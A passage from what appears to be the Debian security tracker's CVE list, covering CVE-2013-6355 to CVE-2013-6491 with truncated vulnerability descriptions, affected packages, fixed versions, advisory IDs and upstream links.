	NOT-FOR-US: Piranha
CVE-2013-6491 (The python-qpid client (common/rpc/impl_qpid.py) in OpenStack Oslo bef ...)
	- nova 2013.2.3-1
	[wheezy] - nova (Minor issue)
CVE-2013-6490 (The SIMPLE protocol functionality in Pidgin before 2.10.8 allows remot ...)
	{DSA-2859-2 DSA-2859-1}
	- pidgin 2.10.8-1
CVE-2013-6489 (Integer signedness error in the MXit functionality in Pidgin before 2. ...)
	{DSA-2859-1}
	- pidgin 2.10.8-1
	[squeeze] - pidgin (Support in oldstable is limited to IRC, Jabber/XMPP, Sametime and SIMPLE)
CVE-2013-6488 REJECTED
CVE-2013-6487 (Integer overflow in libpurple/protocols/gg/lib/http.c in the Gadu-Gadu ...)
	{DSA-2859-1 DSA-2852-1}
	- pidgin 2.10.8-1
	[squeeze] - pidgin (Support in oldstable is limited to IRC, Jabber/XMPP, Sametime and SIMPLE)
	- libgadu 1:1.11.3-1
CVE-2013-6486 (gtkutils.c in Pidgin before 2.10.8 on Windows allows user-assisted rem ...)
	- pidgin (Windows-specific)
CVE-2013-6485 (Buffer overflow in util.c in libpurple in Pidgin before 2.10.8 allows ...)
	{DSA-2859-2 DSA-2859-1}
	- pidgin 2.10.8-1
CVE-2013-6484 (The STUN protocol implementation in libpurple in Pidgin before 2.10.8 ...)
	{DSA-2859-1}
	- pidgin 2.10.8-1
	[squeeze] - pidgin (Support in oldstable is limited to IRC, Jabber/XMPP, Sametime and SIMPLE)
CVE-2013-6483 (The XMPP protocol plugin in libpurple in Pidgin before 2.10.8 does not ...)
	{DSA-2859-1}
	- pidgin 2.10.8-1
	[squeeze] - pidgin (Not suitable for code injection)
CVE-2013-6482 (Pidgin before 2.10.8 allows remote MSN servers to cause a denial of se ...)
	{DSA-2859-1}
	- pidgin 2.10.8-1
	[squeeze] - pidgin (Support in oldstable is limited to IRC, Jabber/XMPP, Sametime and SIMPLE)
CVE-2013-6481 (libpurple/protocols/yahoo/libymsg.c in Pidgin before 2.10.8 allows rem ...)
	{DSA-2859-1}
	- pidgin 2.10.8-1
	[squeeze] - pidgin (Support in oldstable is limited to IRC, Jabber/XMPP, Sametime and SIMPLE)
CVE-2013-6480 (Libcloud 0.12.3 through 0.13.2 does not set the scrub_data parameter f ...)
	- libcloud (affects 0.12.3 to 0.13.3)
	NOTE: versions prior to 0.12.3 don't include a DigitalOcean driver
CVE-2013-6479 (util.c in libpurple in Pidgin before 2.10.8 does not properly allocate ...)
	{DSA-2859-1}
	- pidgin 2.10.8-1
	[squeeze] - pidgin (Not suitable for code injection)
CVE-2013-6478 (gtkimhtml.c in Pidgin before 2.10.8 does not properly interact with un ...)
	{DSA-2859-1}
	- pidgin 2.10.8-1
	[squeeze] - pidgin (Support in oldstable is limited to IRC, Jabber/XMPP, Sametime and SIMPLE)
CVE-2013-6477 (Multiple integer signedness errors in libpurple in Pidgin before 2.10. ...)
	{DSA-2859-1}
	- pidgin 2.10.8-1
	[squeeze] - pidgin (Not suitable for code injection)
CVE-2013-6476 (The OPVPWrapper::loadDriver function in oprs/OPVPWrapper.cxx in the pd ...)
	{DSA-2876-1 DSA-2875-1}
	- cups-filters 1.0.47-1 (bug #741318)
	- cups 1.5.0-16 (bug #741333)
	NOTE: cups moved filters to separate package in 1.5.0-16
	NOTE: in oldstable present in debian/local/filters/pdf-filters/pdftoopvp
	NOTE: http://bzr.linuxfoundation.org/loggerhead/openprinting/cups-filters/revision/7176
CVE-2013-6475 (Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPS ...)
	{DSA-2876-1 DSA-2875-1}
	- cups-filters 1.0.47-1 (bug #741318)
	- cups 1.5.0-16 (bug #741333)
	NOTE: cups moved filters to separate package in 1.5.0-16
	NOTE: in oldstable present in debian/local/filters/pdf-filters/pdftoopvp
	NOTE: http://bzr.linuxfoundation.org/loggerhead/openprinting/cups-filters/revision/7176
CVE-2013-6474 (Heap-based buffer overflow in the pdftoopvp filter in CUPS and cups-fi ...)
	{DSA-2876-1 DSA-2875-1}
	- cups-filters 1.0.47-1 (bug #741318)
	- cups 1.5.0-16 (bug #741333)
	NOTE: cups moved filters to separate package in 1.5.0-16
	NOTE: in oldstable present in debian/local/filters/pdf-filters/pdftoopvp
	NOTE: http://bzr.linuxfoundation.org/loggerhead/openprinting/cups-filters/revision/7176
CVE-2013-6473 (Multiple heap-based buffer overflows in the urftopdf filter in cups-fi ...)
	- cups-filters 1.0.47-1 (bug #741318)
	[wheezy] - cups-filters (does not contain urftopdf filter)
	NOTE: http://bzr.linuxfoundation.org/loggerhead/openprinting/cups-filters/revision/7175
CVE-2013-6472 (MediaWiki before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 ...)
	{DSA-2891-1}
	- mediawiki 1:1.19.10+dfsg-1
	[squeeze] - mediawiki
	NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=58699
CVE-2013-6471
	RESERVED
CVE-2013-6470 (The default configuration in the standalone controller quickstack mani ...)
	NOT-FOR-US: openstack foreman-installer
CVE-2013-6469 (JBoss Overlord Run Time Governance (RTGov) 1.0 for JBossAS allows remo ...)
	NOT-FOR-US: JBoss SOA RTgov
CVE-2013-6468 (JBoss Drools, Red Hat JBoss BRMS before 6.0.1, and Red Hat JBoss BPM S ...)
	NOT-FOR-US: JBoss Drools
CVE-2013-6467 (Libreswan 3.7 and earlier allows remote attackers to cause a denial of ...)
	- libreswan (Fixed before the initial upload to Debian)
	NOTE: https://libreswan.org/security/CVE-2013-6467/CVE-2013-6467.txt
CVE-2013-6466 (Openswan 2.6.39 and earlier allows remote attackers to cause a denial ...)
	{DSA-2893-1}
	- openswan (bug #737406)
	NOTE: https://libreswan.org/security/CVE-2013-6467/CVE-2013-6467.txt
CVE-2013-6465 (Multiple cross-site scripting (XSS) vulnerabilities in JBPM KIE Workbe ...)
	NOT-FOR-US: JBPM KIE Workbench
CVE-2013-6464
	RESERVED
CVE-2013-6463
	REJECTED
CVE-2013-6462 (Stack-based buffer overflow in the bdfReadCharacters function in bitma ...)
	{DSA-2838-1}
	- libxfont 1:1.4.7-1
CVE-2013-6461 (Nokogiri gem 1.5.x and 1.6.x has DoS while parsing XML entities by fai ...)
	- ruby-nokogiri (jruby implementation not shipped)
	- libnokogiri-ruby (1.4 and earlier not affected)
	NOTE: https://groups.google.com/forum/#!topic/ruby-security-ann/DeJpjTAg1FA
CVE-2013-6460 (Nokogiri gem 1.5.x has Denial of Service via infinite loop when parsin ...)
	- ruby-nokogiri (jruby implementation not shipped)
	- libnokogiri-ruby (1.4 and earlier not affected)
	NOTE: https://groups.google.com/forum/#!topic/ruby-security-ann/DeJpjTAg1FA
CVE-2013-6459 (Cross-site scripting (XSS) vulnerability in the will_paginate gem befo ...)
	- ruby-will-paginate 3.0.5-1 (low; bug #733209)
	[wheezy] - ruby-will-paginate (Minor issue)
	- libwill-paginate-ruby
	[squeeze] - libwill-paginate-ruby (Minor issue)
	NOTE: https://github.com/mislav/will_paginate/releases/tag/v3.0.5
CVE-2013-6458 (Multiple race conditions in the (1) virDomainBlockStats, (2) virDomain ...)
	{DSA-2846-1}
	- libvirt 1.2.1-1 (bug #734556)
	[squeeze] - libvirt (Unsupported in squeeze-lts)
	NOTE: https://www.redhat.com/archives/libvir-list/2013-December/msg01202.html
	NOTE: upstream fix: http://libvirt.org/git/?p=libvirt.git;a=commit;h=db86da5ca2109e4006c286a09b6c75bfe10676ad
CVE-2013-6457 (The libxlDomainGetNumaParameters function in the libxl driver (libxl/l ...)
	- libvirt 1.2.1-1
	[wheezy] - libvirt (Vulnerable code not present)
	[squeeze] - libvirt (Vulnerable code not present)
	NOTE: https://www.redhat.com/archives/libvir-list/2013-December/msg01258.html
	NOTE: http://libvirt.org/git/?p=libvirt.git;a=commit;h=f9ee91d35510ccbc6fc42cef8864b291b2d220f4
	NOTE: Introduced in http://libvirt.org/git/?p=libvirt.git;a=commit;h=261c4f5fb93c5e23b8002f2760d4a7937cdb7f63
CVE-2013-6456 (The LXC driver (lxc/lxc_driver.c) in libvirt 1.0.1 through 1.2.1 allow ...)
	- libvirt 1.2.3-1 (bug #732394)
	[wheezy] - libvirt (Vulnerable code not present, introduced in v1.0.1)
	[squeeze] - libvirt (Vulnerable code not present, introduced in v1.0.1)
CVE-2013-6455 (The CentralAuth extension for MediaWiki before 1.19.10, 1.2x before 1. ...)
	NOT-FOR-US: MediaWiki CentralAuth extension
CVE-2013-6454 (Cross-site scripting (XSS) vulnerability in MediaWiki before 1.19.10, ...)
	{DSA-2891-1}
	- mediawiki 1:1.19.10+dfsg-1
	[squeeze] - mediawiki
	NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=58472
CVE-2013-6453 (MediaWiki before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 ...)
	{DSA-2891-1}
	- mediawiki 1:1.19.10+dfsg-1
	[squeeze] - mediawiki
	NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=58553
CVE-2013-6452 (Cross-site scripting (XSS) vulnerability in MediaWiki before 1.19.10, ...)
	{DSA-2891-1}
	- mediawiki 1:1.19.10+dfsg-1
	[squeeze] - mediawiki
	NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=57550
CVE-2013-6451 (Cross-site scripting (XSS) vulnerability in MediaWiki 1.19.9 before 1. ...)
	- mediawiki 1:1.19.10+dfsg-1
	[squeeze] - mediawiki
	NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=58088
	NOTE: Introduced by the fix for CVE-2013-4568
CVE-2013-6450 (The DTLS retransmission implementation in OpenSSL 1.0.0 before 1.0.0l ...)
	{DSA-2833-1}
	- openssl 1.0.1e-5 (low)
	[squeeze] - openssl (Versions earlier than 1.0.0 are not affected)
CVE-2013-6449 (The ssl_get_algorithm2 function in ssl/s3_lib.c in OpenSSL before 1.0. ...)
	{DSA-2833-1}
	- openssl 1.0.1e-5 (bug #732754)
	[squeeze] - openssl (TLS 1.2 support introduced in 1.0.1)
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=1045363
	NOTE: http://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ca98926
	NOTE: http://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0294b2b
CVE-2013-6448 (The InterfaceGenerator handler in JBoss Seam Remoting in JBoss Seam 2 ...)
	NOT-FOR-US: JBoss Seam
CVE-2013-6447 (Multiple XML External Entity (XXE) vulnerabilities in the (1) Executio ...)
	NOT-FOR-US: JBoss Seam
CVE-2013-6446 (The JobHistory Server in Cloudera CDH 4.x before 4.6.0 and 5.x before ...)
	NOT-FOR-US: Cloudera
CVE-2013-6445 (Cumin (aka MRG Management Console), as used in Red Hat Enterprise MRG ...)
	NOT-FOR-US: Cumin
CVE-2013-6444 (PyWBEM 0.7 and earlier does not verify that the server hostname matche ...)
	- pywbem 0.8.0~dev650-1 (bug #732594)
	[squeeze] - pywbem (Minor issue)
	[wheezy] - pywbem (Minor issue)
	NOTE: Fix: https://bugzilla.redhat.com/attachment.cgi?id=851357
CVE-2013-6443 (CloudForms 3.0 Management Engine before 5.2.1.6 allows remote attacker ...)
	NOT-FOR-US: RedHat CloudForms Management Engine
CVE-2013-6442 (The owner_set function in smbcacls.c in smbcacls in Samba 4.0.x before ...)
	- samba 2:4.1.6+dfsg-1 (low)
	[squeeze] - samba (Only affects 4.x and later)
	[wheezy] - samba (Only affects 4.x and later)
	- samba4
	[wheezy] - samba4 4.0.0~beta2+dfsg1-3.2+deb7u1
	NOTE: http://www.samba.org/samba/security/CVE-2013-6442
CVE-2013-6441 (The lxc-sshd template (templates/lxc-sshd.in) in LXC before 1.0.0.beta ...)
	{DLA-442-1}
	- lxc 1.0.0-1 (unimportant)
	NOTE: getting root on host, if not using unprivileged containers or
	NOTE: restricting the containers with apparmor or selinux.
	NOTE: CVE is kept as no official documentation explicitly documents this fact
	NOTE: https://github.com/lxc/lxc/commit/f4d5cc8e1f39d132b61e110674528cac727ae0e2 (lxc-1.0.0.beta2)
CVE-2013-6440 (The (1) BasicParserPool, (2) StaticBasicParserPool, (3) XML Decrypter, ...)
	- opensaml2 (Debian provides the C-based Shibboleth implementation)
	NOTE: http://shibboleth.net/community/advisories/secadv_20131213.txt
	NOTE: http://blog.sendsafely.com/post/69590974866/web-based-single-sign-on-and-the-dangers-of-saml-xml
CVE-2013-6439 (Candlepin in Red Hat Subscription Asset Manager 1.0 through 1.3 uses a ...)
	NOT-FOR-US: Candlepin
CVE-2013-6438 (The dav_xml_get_cdata function in main/util.c in the mod_dav module in ...)
	{DLA-66-1}
	- apache2 2.4.9-1
	[wheezy] - apache2 2.2.22-13+deb7u2
CVE-2013-6437 (The libvirt driver in OpenStack Compute (Nova) before 2013.2.2 and ice ...)
	- nova 2013.2.2
	[wheezy] - nova (Vulnerable code not present)
CVE-2013-6436 (The lxcDomainGetMemoryParameters method in lxc/lxc_driver.c in libvirt ...)
	- libvirt 1.2.0-1
	[squeeze] - libvirt (vulnerable code not present, introduced in 1.1)
	[wheezy] - libvirt (vulnerable code not present, introduced in 1.1)
CVE-2013-6435 (Race condition in RPM 4.11.1 and earlier allows remote attackers to ex ...)
	{DSA-3129-1 DLA-140-1}
	- rpm 4.11.3-1.1 (bug #773101)
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=1039811
CVE-2013-6434 (The remote-viewer in Red Hat Enterprise Virtualization Manager (RHEV-M ...)
	NOT-FOR-US: RHEV Manager
CVE-2013-6433 (The default configuration in the Red Hat openstack-neutron package bef ...)
	- quantum
	[wheezy] - quantum (Minor issue)
	- neutron 2014.1-1
	NOTE: Likely fixed even earlier than 2014.1-1, but that was the oldest version checked
CVE-2013-6432 (The ping_recvmsg function in net/ipv4/ping.c in the Linux kernel befor ...)
	- linux 3.12.6-1
	[wheezy] - linux (Vulnerable code introduced in 3.11)
	- linux-2.6 (Vulnerable code introduced in 3.11)
	NOTE: Introduced by https://git.kernel.org/linus/6d0bfe22611602f36617bc7aa2ffa1bbb2f54c67
	NOTE: fixed by https://git.kernel.org/linus/cf970c002d270c36202bd5b9c2804d3097a52da0
CVE-2013-6431 (The fib6_add function in net/ipv6/ip6_fib.c in the Linux kernel before ...)
	- linux-2.6 (Vulnerable code not present)
	- linux 3.11.5-1 (low)
	[wheezy] - linux (Vulnerable code not present)
	NOTE: fixed by https://git.kernel.org/linus/ae7b4e1f213aa659aedf9c6ecad0bf5f0476e1e2
CVE-2013-6430 (The JavaScriptUtils.javaScriptEscape method in web/util/JavaScriptUtil ...)
	{DSA-2857-1}
	- libspring-java 3.0.6.RELEASE-11 (bug #735420)
CVE-2013-6429 (The SourceHttpMessageConverter in Spring MVC in Spring Framework befor ...)
	{DSA-2857-1}
	- libspring-java 3.0.6.RELEASE-11 (bug #735420)
CVE-2013-6428 (The ReST API in OpenStack Orchestration API (Heat) before Havana 2013. ...)
	- heat 2013.2.1-1 (bug #732033)
	NOTE: https://launchpad.net/bugs/1256983
CVE-2013-6427 (upgrade.py in the hp-upgrade service in HP Linux Imaging and Printing ...)
	{DSA-2829-1}
	- hplip 3.13.11-2 (bug #731480)
	[squeeze] - hplip (Vulnerable code not present)
	NOTE: https://bugzilla.suse.com/show_bug.cgi?id=853405
CVE-2013-6426 (The cloudformation-compatible API in OpenStack Orchestration API (Heat ...)
	- heat 2013.2.1-1 (bug #732033)
	NOTE: https://launchpad.net/bugs/1256049
CVE-2013-6425 (Integer underflow in the pixman_trapezoid_valid macro in pixman.h in P ...)
	{DSA-2823-1}
	- pixman 0.30.2-2
CVE-2013-6424 (Integer underflow in the xTrapezoidValid macro in render/picture.h in ...)
	{DSA-2822-1}
	- xorg-server 2:1.14.2.901-1 (low; bug #742922)
	NOTE: Band-aid fix in Wheezy not applicable to upstream code, fixed post-Wheezy
	NOTE: in pixman: http://cgit.freedesktop.org/pixman/commit/?id=5e14da97f16e421d084a9e735be21b1025150f0c
	NOTE: Mark the first post-wheezy xorg-server as a pseudo fixed version
CVE-2013-6423
	RESERVED
CVE-2013-6422 (The GnuTLS backend in libcurl 7.21.4 through 7.33.0, when disabling di ...)
	{DSA-2824-1}
	- curl 7.34.0-1
	[squeeze] - curl (issue introduced with 59cf93cc, 7.21.4)
CVE-2013-6421 (The unpack_zip function in archive_unpacker.rb in the sprout gem 0.7.2 ...)
	NOT-FOR-US: Ruby Gem sprout
CVE-2013-6420 (The asn1_time_to_time_t function in ext/openssl/openssl.c in PHP befor ...)
	{DSA-2816-1}
	- php5 5.5.6+dfsg-2 (bug #731895)
	NOTE: https://git.php.net/?p=php-src.git;a=commit;h=c1224573c773b6845e83505f717fbf820fc18415
CVE-2013-6419 (Interaction error in OpenStack Nova and Neutron before Havana 2013.2.1 ...)
	- neutron 2013.2.1-1
	- nova 2013.2.1-1
	[wheezy] - nova (Only exploitable in combination with neutron, not in Wheezy)
	NOTE: https://launchpad.net/bugs/1235450
CVE-2013-6418 (PyWBEM 0.7 and earlier uses a separate connection to validate X.509 ce ...)
	- pywbem 0.8.0~dev650-1 (low; bug #732594)
	[squeeze] - pywbem (Minor issue)
	[wheezy] - pywbem (Minor issue)
	NOTE: fix: https://bugzilla.redhat.com/attachment.cgi?id=851357
CVE-2013-6417 (actionpack/lib/action_dispatch/http/request.rb in Ruby on Rails before ...)
	{DSA-2888-1}
	- rails-4.0 4.0.2+dfsg-1 (bug #731290)
	- rails-3.2 3.2.16-3+0
	- ruby-actionpack-3.2 3.2.16-1 (bug #731288)
	- ruby-actionpack-2.3 (vulnerable code not present)
	- rails (vulnerable code not present)
	NOTE: Starting with 2.3.14.1 rails is a transition package
	NOTE: CVE for incomplete fix for CVE-2013-0155
CVE-2013-6416 (Cross-site scripting (XSS) vulnerability in the simple_format helper i ...)
	- rails-4.0 4.0.2+dfsg-1 (bug #731290)
	- ruby-actionpack-3.2 (vulnerable code not present)
	- ruby-actionpack-2.3 (vulnerable code not present)
	- rails (vulnerable code not present)
	NOTE: Starting with 2.3.14.1 rails is a transition package
CVE-2013-6415 (Cross-site scripting (XSS) vulnerability in the number_to_currency hel ...)
	{DSA-2888-1}
	- rails-4.0 4.0.2+dfsg-1 (bug #731290)
	- rails-3.2 3.2.16-3+0
	- ruby-actionpack-3.2 3.2.16-1 (bug #731288)
	- ruby-actionpack-2.3 (bug #731289)
	[wheezy] - ruby-actionpack-2.3
	- rails (vulnerable code not present)
	NOTE: Starting with 2.3.14.1 rails is a transition package
CVE-2013-6414 (actionpack/lib/action_view/lookup_context.rb in Action View in Ruby on ...)
	{DSA-2888-1}
	- rails-4.0 4.0.2+dfsg-1 (bug #731290)
	- rails-3.2 3.2.16-3+0
	- ruby-actionpack-3.2 3.2.16-1 (bug #731288)
	- ruby-actionpack-2.3 (vulnerable code not present)
	- rails (vulnerable code not present)
	NOTE: Starting with 2.3.14.1 rails is a transition package
CVE-2013-6413 (Use-after-free vulnerability in UnrealIRCd 3.2.10 before 3.2.10.2 allo ...)
	- unrealircd (bug #515130)
	NOTE: http://forums.unrealircd.com/viewtopic.php?f=2&t=8221
CVE-2013-6412 (The transform_save function in transform.c in Augeas 1.0.0 through 1.1 ...)
	{DLA-28-1}
	- augeas 1.2.0-0.1 (bug #731111)
	[wheezy] - augeas (Affected patch not present/applied)
	[squeeze] - augeas (Affected patch not present/applied)
	NOTE: only if applied original patch for CVE-2012-0786
CVE-2013-6411 (The HandleCrashedAircraft function in aircraft_cmd.cpp in OpenTTD 0.3. ...)
	- openttd 1.3.3-1 (low)
	[squeeze] - openttd 1.0.4-7
	[wheezy] - openttd 1.2.1-3
	NOTE: http://bugs.openttd.org/task/5820
CVE-2013-6410 (nbd-server in Network Block Device (nbd) before 3.5 does not properly ...)
	{DSA-2806-1}
	- nbd 1:3.5-1
	NOTE: http://anonscm.debian.org/gitweb/?p=users/wouter/nbd.git;a=commitdiff;h=0e9bd98c44dd94d9ede92655a36849fbc8cbf5b9
CVE-2013-6409 (Debian adequate before 0.8.1, when run by root with the --user option, ...)
	- adequate 0.8.1 (bug #730691)
	NOTE: https://bitbucket.org/jwilk/adequate/commits/94e5fc5d810057bffb673501ed809f7c2dabd9ee
CVE-2013-6408 (The DocumentAnalysisRequestHandler in Apache Solr before 4.3.1 does no ...)
	{DSA-2963-1}
	- lucene-solr 3.6.2+dfsg-2 (bug #731113)
	NOTE: https://issues.apache.org/jira/browse/SOLR-4881
CVE-2013-6407 (The UpdateRequestHandler for XML in Apache Solr before 4.1 allows remo ...)
	{DSA-2963-1}
	- lucene-solr 3.6.2+dfsg-2 (bug #731113)
	NOTE: https://issues.apache.org/jira/browse/SOLR-3895
CVE-2013-6406
	REJECTED
CVE-2013-6405
	REJECTED
CVE-2013-6404 (Quassel core (server daemon) in Quassel IRC before 0.9.2 does not prop ...)
	- quassel 0.9.2-1 (low)
	[wheezy] - quassel 0.8.0-1+deb7u1
	[squeeze] - quassel (Minor issue)
	NOTE: https://github.com/quassel/quassel/commit/a1a24da
CVE-2013-6403 (The admin page in ownCloud before 5.0.13 allows remote attackers to by ...)
	- owncloud 5.0.13+dfsg-1
CVE-2013-6402 (base/pkit.py in HP Linux Imaging and Printing (HPLIP) through 3.13.11 ...)
	{DSA-2829-1}
	- hplip 3.13.11-2.1 (bug #725876)
	NOTE: https://bugzilla.suse.com/show_bug.cgi?id=852368
CVE-2013-6401 (Jansson, possibly 2.4 and earlier, does not restrict the ability to tr ...)
	- jansson 2.6-1 (bug #738647)
	[wheezy] - jansson (Minor issue)
CVE-2013-6400 (Xen 4.2.x and 4.3.x, when using Intel VT-d and a PCI device has been a ...)
	- xen 4.4.0-1
	[wheezy] - xen (4.2.x and later are vulnerable)
	[squeeze] - xen (4.2.x and later are vulnerable)
CVE-2013-6399 (Array index error in the virtio_load function in hw/virtio/virtio.c in ...)
	- qemu 2.1+dfsg-1 (low; bug #739589)
	[squeeze] - qemu (Minor issue, hardly exploitable in practice)
	[wheezy] - qemu (Minor issue, hardly exploitable in practice)
	[wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice)
	- qemu-kvm (low)
	[squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice)
CVE-2013-6398 (The virtual router in Apache CloudStack before 4.2.1 does not preserve ...)
	NOT-FOR-US: Apache CloudStack
CVE-2013-6397 (Directory traversal vulnerability in SolrResourceLoader in Apache Solr ...)
	{DSA-2963-1}
	- lucene-solr 3.6.2+dfsg-2 (bug #731113)
	NOTE: https://issues.apache.org/jira/browse/SOLR-4882
CVE-2013-6396 (The OpenStack Python client library for Swift (python-swiftclient) 1.0 ...)
	- python-swiftclient 1:2.0.2-1 (bug #730626)
	NOTE: https://bugs.launchpad.net/python-swiftclient/+bug/1199783
CVE-2013-6395 (Cross-site scripting (XSS) vulnerability in header.php in Ganglia Web ...)
	- ganglia-web 3.6.1-1 (unimportant; bug #730507)
	[squeeze] - ganglia (Vulnerable code not present)
	NOTE: See README.Debian.security, only supported behind an authenticated HTTP zone, #702776
	- ganglia 3.6.0-1
	[wheezy] - ganglia (Minor issue)
	NOTE: ganglia-web and ganglia are now two separate source packages
	NOTE: starting with 3.6.0-1 the web frontend is no longer built from src:ganglia so marking this version as fixed
	NOTE: https://github.com/ganglia/ganglia-web/issues/218
	NOTE: https://github.com/ganglia/ganglia-web/commit/fbdf26542510c01931dac7856bb908f651ad05e6
CVE-2013-6394 (Percona XtraBackup before 2.1.6 uses a constant string for the initial ...)
	- percona-xtrabackup 2.1.6-2 (bug #730544)
CVE-2013-6393 (The yaml_parser_scan_tag_uri function in scanner.c in LibYAML before 0 ...)
	{DSA-2870-1 DSA-2850-1}
	- libyaml 0.1.4-3 (bug #737076)
	- libyaml-libyaml-perl 0.41-4
CVE-2013-6392 (The genlock_dev_ioctl function in genlock.c in the Genlock driver for ...)
	- linux-2.6 (Android-specific)
	- linux (Android-specific)
	NOTE: https://www.codeaurora.org/cgit/quic/la/kernel/msm/commit/drivers/base/genlock.c?id=e3c43027bdb59f03eec7ead0a01c77e4bf801625&h=jb_3.2.3
CVE-2013-6391 (The ec2tokens API in OpenStack Identity (Keystone) before Havana 2013. ...)
	- keystone 2013.2.1-1 (bug #731981)
	[wheezy] - keystone (vulnerable code not present)
	NOTE: https://launchpad.net/bugs/1242597
CVE-2013-6390
	RESERVED
CVE-2013-6389 (Open redirect vulnerability in the Overlay module in Drupal 7.x before ...)
	{DSA-2804-1}
	- drupal7 7.24-1
CVE-2013-6388 (Cross-site scripting (XSS) vulnerability in the Color module in Drupal ...)
	{DSA-2804-1}
	- drupal7 7.24-1
CVE-2013-6387 (Cross-site scripting (XSS) vulnerability in the Image module in Drupal ...)
	{DSA-2804-1}
	- drupal7 7.24-1
CVE-2013-6386 (Drupal 6.x before 6.29 and 7.x before 7.24 uses the PHP mt_rand functi ...)
	{DSA-2828-1 DSA-2804-1}
	- drupal6
	- drupal7 7.24-1
	NOTE: https://drupal.org/SA-CORE-2013-003
CVE-2013-6385 (The form API in Drupal 6.x before 6.29 and 7.x before 7.24, when used ...)
	{DSA-2828-1 DSA-2804-1}
	- drupal6
	- drupal7 7.24-1
	NOTE: https://drupal.org/SA-CORE-2013-003
CVE-2013-6384 ((1) impl_db2.py and (2) impl_mongodb.py in OpenStack Ceilometer 2013.2 ...)
	- ceilometer 2013.2-4 (bug #730227)
CVE-2013-6383 (The aac_compat_ioctl function in drivers/scsi/aacraid/linit.c in the L ...)
	{DSA-2906-1}
	- linux-2.6
	[wheezy] - linux 3.2.53-1
	- linux 3.11.8-1
	NOTE: https://git.kernel.org/linus/f856567b930dfcdbc3323261bf77240ccdde01f5
CVE-2013-6382 (Multiple buffer underflows in the XFS implementation in the Linux kern ...)
	{DSA-2906-1}
	- linux-2.6 (low)
	- linux 3.11.10-1 (low)
	[wheezy] - linux 3.2.53-1
CVE-2013-6381 (Buffer overflow in the qeth_snmp_command function in drivers/s390/net/ ...)
	{DSA-2906-1}
	- linux-2.6 (low)
	- linux 3.11.10-1 (low)
	[wheezy] - linux 3.2.53-1
	NOTE: https://git.kernel.org/linus/6fb392b1a63ae36c31f62bc3fc8630b49d602b62
CVE-2013-6380 (The aac_send_raw_srb function in drivers/scsi/aacraid/commctrl.c in th ...)
	{DSA-2906-1}
	- linux-2.6
	- linux 3.11.10-1
	[wheezy] - linux 3.2.53-1
	NOTE: https://git.kernel.org/linus/b4789b8e6be3151a955ade74872822f30e8cd914
CVE-2013-6379
	REJECTED
CVE-2013-6378 (The lbs_debugfs_write function in drivers/net/wireless/libertas/debugf ...)
	{DSA-2906-1}
	- linux-2.6 (low)
	- linux 3.11.10-1 (low)
	[wheezy] - linux 3.2.53-1
	NOTE: https://git.kernel.org/linus/a497e47d4aec37aaf8f13509f3ef3d1f6a717d88
CVE-2013-6377
	REJECTED
CVE-2013-6376 (The recalculate_apic_map function in arch/x86/kvm/lapic.c in the KVM s ...)
	- linux 3.12.5-1
	[wheezy] - linux (Introduced in 3.7)
	- linux-2.6 (Introduced in 3.7)
CVE-2013-6375 (Xen 4.2.x and 4.3.x, when using Intel VT-d for PCI passthrough, does n ...)
	- xen 4.4.0-1 (bug #730254)
	[squeeze] - xen (Only affects >= 4.2)
	[wheezy] - xen (Only affects >= 4.2)
CVE-2013-6374 (Cross-site scripting (XSS) vulnerability in the Build Failure Analyzer ...)
	- jenkins (Affected plugins are not shipped in Debian, bug #730457)
CVE-2013-6373 (The Exclusion plugin before 0.9 for Jenkins does not properly prevent ...)
	- jenkins (Affected plugins are not shipped in Debian, bug #730457)
CVE-2013-6372 (The Subversion plugin before 1.54 for Jenkins stores credentials using ...)
	- jenkins (Affected plugins are not shipped in Debian, bug #730457)
CVE-2013-6371 (The hash functionality in json-c before 0.12 allows context-dependent ...)
	- json-c 0.11-4 (bug #744008)
	[wheezy] - json-c (Minor issue)
	[squeeze] - json-c (Minor issue)
	NOTE: https://github.com/json-c/json-c/commit/64e36901a0614bf64a19bc3396469c66dcd0b015
CVE-2013-6370 (Buffer overflow in the printbuf APIs in json-c before 0.12 allows remo ...)
	- json-c 0.11-4 (bug #744008)
	[wheezy] - json-c (Minor issue)
	[squeeze] - json-c (Minor issue)
	NOTE: https://github.com/json-c/json-c/commit/64e36901a0614bf64a19bc3396469c66dcd0b015
CVE-2013-6369 (Stack-based buffer overflow in the jbg_dec_in function in libjbig/jbig ...)
	{DSA-2900-1}
	- jbigkit 2.0-2.1 (bug #743960)
CVE-2013-6368 (The KVM subsystem in the Linux kernel through 3.12.5 allows local user ...)
	- linux 3.12.5-1
	[squeeze] - linux-2.6 (Too intrusive to backport, KVM server not supported in squeeze-lts)
	- linux-2.6
	[wheezy] - linux 3.2.54-1
CVE-2013-6367 (The apic_get_tmcct function in arch/x86/kvm/lapic.c in the KVM subsyst ...)
	{DSA-2906-1}
	- linux 3.12.5-1
	- linux-2.6
	[wheezy] - linux 3.2.54-1
CVE-2013-6363
	RESERVED
CVE-2013-6362 (Xerox ColorCube and WorkCenter devices in 2013 had hardcoded FTP and s ...)
	NOT-FOR-US: Xerox
CVE-2013-6361
	RESERVED
CVE-2013-6360 (TRENDnet TS-S402 has a backdoor to enable TELNET. ...)
	NOT-FOR-US: TRENDnet
CVE-2013-6359 (Munin::Master::Node in Munin before 2.0.18 allows remote attackers to ...)
	{DSA-2815-1 DLA-20-1}
	- munin 2.0.18-1
	[squeeze] - munin 1.4.5-3+deb6u1
	NOTE: http://munin-monitoring.org/ticket/1397
CVE-2013-6358 (PrestaShop 1.5.5 allows remote authenticated attackers to execute arbi ...)
	NOT-FOR-US: PrestaShop
CVE-2013-6357 (** DISPUTED ** Cross-site request forgery (CSRF) vulnerability in the ...)
	NOT-FOR-US: Disputed non-issue in Tomcat
CVE-2013-6356
	REJECTED
CVE-2013-6355
	REJECTED
